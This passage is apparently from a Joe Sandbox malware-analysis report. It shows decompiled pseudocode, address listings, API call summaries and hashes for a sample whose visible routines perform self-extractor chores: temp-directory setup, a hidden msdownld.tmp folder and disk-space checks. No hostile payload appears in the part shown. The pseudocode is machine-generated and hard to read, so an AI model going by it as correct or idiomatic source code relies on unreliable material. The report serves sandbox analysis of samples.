                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E010D597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x10d8b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E010D5467(0x10d8b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E010D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E010D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x010d55ab
                                                                                                                                                                                                                                            0x010d55b2
                                                                                                                                                                                                                                            0x010d55c9
                                                                                                                                                                                                                                            0x010d55d5
                                                                                                                                                                                                                                            0x010d55d9
                                                                                                                                                                                                                                            0x010d5600
                                                                                                                                                                                                                                            0x010d5605
                                                                                                                                                                                                                                            0x010d560a
                                                                                                                                                                                                                                            0x010d560c
                                                                                                                                                                                                                                            0x010d5638
                                                                                                                                                                                                                                            0x010d5641
                                                                                                                                                                                                                                            0x010d5643
                                                                                                                                                                                                                                            0x010d5645
                                                                                                                                                                                                                                            0x010d5645
                                                                                                                                                                                                                                            0x010d564c
                                                                                                                                                                                                                                            0x010d5652
                                                                                                                                                                                                                                            0x010d5657
                                                                                                                                                                                                                                            0x010d5659
                                                                                                                                                                                                                                            0x010d5696
                                                                                                                                                                                                                                            0x010d569c
                                                                                                                                                                                                                                            0x010d589f
                                                                                                                                                                                                                                            0x010d58a7
                                                                                                                                                                                                                                            0x010d58ac
                                                                                                                                                                                                                                            0x010d58b3
                                                                                                                                                                                                                                            0x010d58b5
                                                                                                                                                                                                                                            0x010d56a2
                                                                                                                                                                                                                                            0x010d56a2
                                                                                                                                                                                                                                            0x010d56a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56ae
                                                                                                                                                                                                                                            0x010d56ae
                                                                                                                                                                                                                                            0x010d56b9
                                                                                                                                                                                                                                            0x010d56bf
                                                                                                                                                                                                                                            0x010d56c1
                                                                                                                                                                                                                                            0x010d56f3
                                                                                                                                                                                                                                            0x010d56f3
                                                                                                                                                                                                                                            0x010d5705
                                                                                                                                                                                                                                            0x010d570a
                                                                                                                                                                                                                                            0x010d5711
                                                                                                                                                                                                                                            0x010d5717
                                                                                                                                                                                                                                            0x010d5724
                                                                                                                                                                                                                                            0x010d5726
                                                                                                                                                                                                                                            0x010d5729
                                                                                                                                                                                                                                            0x010d5730
                                                                                                                                                                                                                                            0x010d5737
                                                                                                                                                                                                                                            0x010d573d
                                                                                                                                                                                                                                            0x010d5740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d572b
                                                                                                                                                                                                                                            0x010d572b
                                                                                                                                                                                                                                            0x010d572e
                                                                                                                                                                                                                                            0x010d5742
                                                                                                                                                                                                                                            0x010d5742
                                                                                                                                                                                                                                            0x010d5745
                                                                                                                                                                                                                                            0x010d576b
                                                                                                                                                                                                                                            0x010d576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5747
                                                                                                                                                                                                                                            0x010d5747
                                                                                                                                                                                                                                            0x010d574d
                                                                                                                                                                                                                                            0x010d574f
                                                                                                                                                                                                                                            0x010d5771
                                                                                                                                                                                                                                            0x010d5771
                                                                                                                                                                                                                                            0x010d5773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5751
                                                                                                                                                                                                                                            0x010d5751
                                                                                                                                                                                                                                            0x010d5753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5755
                                                                                                                                                                                                                                            0x010d575b
                                                                                                                                                                                                                                            0x010d5760
                                                                                                                                                                                                                                            0x010d5762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5764
                                                                                                                                                                                                                                            0x010d5764
                                                                                                                                                                                                                                            0x010d5769
                                                                                                                                                                                                                                            0x010d577e
                                                                                                                                                                                                                                            0x010d577e
                                                                                                                                                                                                                                            0x010d5781
                                                                                                                                                                                                                                            0x010d5788
                                                                                                                                                                                                                                            0x010d578d
                                                                                                                                                                                                                                            0x010d578f
                                                                                                                                                                                                                                            0x010d57b2
                                                                                                                                                                                                                                            0x010d57b8
                                                                                                                                                                                                                                            0x010d57bd
                                                                                                                                                                                                                                            0x010d57bf
                                                                                                                                                                                                                                            0x010d57cd
                                                                                                                                                                                                                                            0x010d57cd
                                                                                                                                                                                                                                            0x010d57dd
                                                                                                                                                                                                                                            0x010d57e3
                                                                                                                                                                                                                                            0x010d57ef
                                                                                                                                                                                                                                            0x010d57f5
                                                                                                                                                                                                                                            0x010d57f8
                                                                                                                                                                                                                                            0x010d580a
                                                                                                                                                                                                                                            0x010d580a
                                                                                                                                                                                                                                            0x010d57fa
                                                                                                                                                                                                                                            0x010d5802
                                                                                                                                                                                                                                            0x010d5802
                                                                                                                                                                                                                                            0x010d580d
                                                                                                                                                                                                                                            0x010d580f
                                                                                                                                                                                                                                            0x010d5830
                                                                                                                                                                                                                                            0x010d5836
                                                                                                                                                                                                                                            0x010d583d
                                                                                                                                                                                                                                            0x010d584b
                                                                                                                                                                                                                                            0x010d5851
                                                                                                                                                                                                                                            0x010d5855
                                                                                                                                                                                                                                            0x010d585a
                                                                                                                                                                                                                                            0x010d585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x010d5811
                                                                                                                                                                                                                                            0x010d5817
                                                                                                                                                                                                                                            0x010d5819
                                                                                                                                                                                                                                            0x010d581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d581f
                                                                                                                                                                                                                                            0x010d5791
                                                                                                                                                                                                                                            0x010d5797
                                                                                                                                                                                                                                            0x010d579c
                                                                                                                                                                                                                                            0x010d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d57a0
                                                                                                                                                                                                                                            0x010d57a9
                                                                                                                                                                                                                                            0x010d57ae
                                                                                                                                                                                                                                            0x010d57b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d57b0
                                                                                                                                                                                                                                            0x010d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5769
                                                                                                                                                                                                                                            0x010d5762
                                                                                                                                                                                                                                            0x010d5753
                                                                                                                                                                                                                                            0x010d574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56c3
                                                                                                                                                                                                                                            0x010d56c5
                                                                                                                                                                                                                                            0x010d56c9
                                                                                                                                                                                                                                            0x010d56ce
                                                                                                                                                                                                                                            0x010d56d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56d6
                                                                                                                                                                                                                                            0x010d56d6
                                                                                                                                                                                                                                            0x010d56d8
                                                                                                                                                                                                                                            0x010d56dd
                                                                                                                                                                                                                                            0x010d56df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56e1
                                                                                                                                                                                                                                            0x010d56e2
                                                                                                                                                                                                                                            0x010d56e4
                                                                                                                                                                                                                                            0x010d56e6
                                                                                                                                                                                                                                            0x010d56eb
                                                                                                                                                                                                                                            0x010d56ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56f3
                                                                                                                                                                                                                                            0x010d56f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d586c
                                                                                                                                                                                                                                            0x010d5878
                                                                                                                                                                                                                                            0x010d587e
                                                                                                                                                                                                                                            0x010d5882
                                                                                                                                                                                                                                            0x010d5883
                                                                                                                                                                                                                                            0x010d5889
                                                                                                                                                                                                                                            0x010d588e
                                                                                                                                                                                                                                            0x010d588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5896
                                                                                                                                                                                                                                            0x010d56ed
                                                                                                                                                                                                                                            0x010d56df
                                                                                                                                                                                                                                            0x010d56d0
                                                                                                                                                                                                                                            0x010d56c1
                                                                                                                                                                                                                                            0x010d56a8
                                                                                                                                                                                                                                            0x010d565b
                                                                                                                                                                                                                                            0x010d565b
                                                                                                                                                                                                                                            0x010d565d
                                                                                                                                                                                                                                            0x010d5669
                                                                                                                                                                                                                                            0x010d5669
                                                                                                                                                                                                                                            0x010d565f
                                                                                                                                                                                                                                            0x010d565f
                                                                                                                                                                                                                                            0x010d5665
                                                                                                                                                                                                                                            0x010d5667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5667
                                                                                                                                                                                                                                            0x010d566c
                                                                                                                                                                                                                                            0x010d5673
                                                                                                                                                                                                                                            0x010d5678
                                                                                                                                                                                                                                            0x010d567a
                                                                                                                                                                                                                                            0x010d589b
                                                                                                                                                                                                                                            0x010d589b
                                                                                                                                                                                                                                            0x010d5680
                                                                                                                                                                                                                                            0x010d5685
                                                                                                                                                                                                                                            0x010d568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d568c
                                                                                                                                                                                                                                            0x010d567a
                                                                                                                                                                                                                                            0x010d560e
                                                                                                                                                                                                                                            0x010d5613
                                                                                                                                                                                                                                            0x010d561a
                                                                                                                                                                                                                                            0x010d5620
                                                                                                                                                                                                                                            0x010d5626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5626
                                                                                                                                                                                                                                            0x010d55db
                                                                                                                                                                                                                                            0x010d55e0
                                                                                                                                                                                                                                            0x010d55e7
                                                                                                                                                                                                                                            0x010d55f1
                                                                                                                                                                                                                                            0x010d55f6
                                                                                                                                                                                                                                            0x010d55f6
                                                                                                                                                                                                                                            0x010d55f6
                                                                                                                                                                                                                                            0x010d58b7
                                                                                                                                                                                                                                            0x010d58c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010D55CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010D5638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5620
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,010D91E4), ref: 010D56B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010D571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010D5737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010D57CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010D57EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010D5802
                                                                                                                                                                                                                                              • Part of subcall function 010D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010D2654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010D5830
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010D5878
                                                                                                                                                                                                                                              • Part of subcall function 010D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
                                                                                                                                                                                                                                              • Part of subcall function 010D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-4006054585
                                                                                                                                                                                                                                            • Opcode ID: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
                                                                                                                                                                                                                                            • Instruction ID: b5e51a2693d29ccb0a445e1d2ad9fff9d3cfed90477a5a322974a52b8eba9b6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 638114B0B043159AEB71AA78AC84BFE76BDAF65340F0400E5EDC6E3185EE758DC18B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 10d597d-10d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10d59dd-10d5a1b GetDiskFreeSpaceA 324->325 326 10d59bb-10d59d8 call 10d44b9 call 10d6285 324->326 328 10d5ba1-10d5bde memset call 10d6285 GetLastError FormatMessageA 325->328 329 10d5a21-10d5a4a MulDiv 325->329 345 10d5c05-10d5c14 call 10d6ce0 326->345 337 10d5be3-10d5bfc call 10d44b9 SetCurrentDirectoryA 328->337 329->328 331 10d5a50-10d5a6c GetVolumeInformationA 329->331 334 10d5a6e-10d5ab0 memset call 10d6285 GetLastError FormatMessageA 331->334 335 10d5ab5-10d5aca SetCurrentDirectoryA 331->335 334->337 339 10d5acc-10d5ad1 335->339 351 10d5c02 337->351 343 10d5ad3-10d5ad8 339->343 344 10d5ae2-10d5ae4 339->344 343->344 347 10d5ada-10d5ae0 343->347 349 10d5ae7-10d5af8 344->349 350 10d5ae6 344->350 347->339 347->344 353 10d5af9-10d5afb 349->353 350->349 354 10d5c04 351->354 355 10d5afd-10d5b03 353->355 356 10d5b05-10d5b08 353->356 354->345 355->353 355->356 357 10d5b0a-10d5b1b call 10d44b9 356->357 358 10d5b20-10d5b27 356->358 357->351 359 10d5b29-10d5b33 358->359 360 10d5b52-10d5b5b 358->360 359->360 363 10d5b35-10d5b50 359->363 364 10d5b62-10d5b6d 360->364 363->364 365 10d5b6f-10d5b74 364->365 366 10d5b76-10d5b7d 364->366 367 10d5b85 365->367 368 10d5b7f-10d5b81 366->368 369 10d5b83 366->369 370 10d5b87-10d5b94 call 10d268b 367->370 371 10d5b96-10d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E010D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E010D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x10d9a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x10d9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x10d9a38;
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x10d9124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E010D268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = ( *0x10d9a38 >> 2) +  *0x10d9a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
